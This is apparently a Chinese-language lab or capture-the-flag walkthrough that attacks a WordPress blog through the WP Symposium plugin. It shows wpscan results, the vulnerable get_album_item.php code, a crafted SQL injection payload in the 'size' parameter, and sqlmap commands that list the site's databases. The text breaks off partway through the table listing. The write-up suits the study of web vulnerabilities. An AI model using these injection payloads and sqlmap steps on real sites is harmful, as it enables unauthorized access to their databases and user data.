0x00 信息收集 网址是一个wordpress博客。
既然是wp,直接用wpscan扫一扫。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [+] We found 2 plugins: [+] Name: akismet | Latest version: 3.3.4 | Location: http://218.2.197.234:2040/wp-content/plugins/akismet/ [!] We could not determine a version so all vulnerabilities are printed out [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html [i] Fixed in: 3.1.5 [+] Name: wp-symposium - v15.1 | Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/ | Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt [!] The version is out of date, the latest version is 15.8.1
找到了两个“过气”插件,存在漏洞。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [!] Title: WP Symposium <= 15.1 - SQL Injection Reference: https://wpvulndb.com/vulnerabilities/7902 Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479 Reference: http://packetstormsecurity.com/files/131801/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325 Reference: https://www.exploit-db.com/exploits/37080/ [i] Fixed in: 15.4 [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8140 Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522 Reference: https://www.exploit-db.com/exploits/37824/ [i] Fixed in: 15.8 [!] Title: WP Symposium <= 15.1 - Blind SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8148 Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/ [i] Fixed in: 15.8
0x01 漏洞利用 CVE-2015-3325的sql注入是利用wp-symposium插件中的get_album_item.php。
1 2 3 4 5 6 7 8 9 10 include_once('../../../wp-config.php'); global $wpdb; $iid = $_REQUEST['iid']; $size = $_REQUEST['size']; $sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d"; $image = $wpdb->get_var($wpdb->prepare($sql, $iid)); header("Content-type: image/jpeg"); echo stripslashes($image); ?>
构造size参数,来进行sql查询,代码也没有过滤,但是在查询列名限制table_name的时候却没有返回,如果不限制table_name,会因为文件大小限制只显示1kb的内容,看不到wp_users的列名。
1 ?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
无奈,放弃这个漏洞,看那个盲注的CVE。
https://www.exploit-db.com/exploits/37822/
topic_id参数存在盲注,访问对应页面,将post请求保存到文件中,用sqlmap来测试。(测试的时候没有删掉exp中的sleep函数,导致脚本多跑了好久。。。)
1 sqlmap -r "E:1.txt" --dbs --level 3
1 2 3 4 5 available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] wordpress
表名
1 sqlmap -r "E:1.txt" -D "wordpress" --tables
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28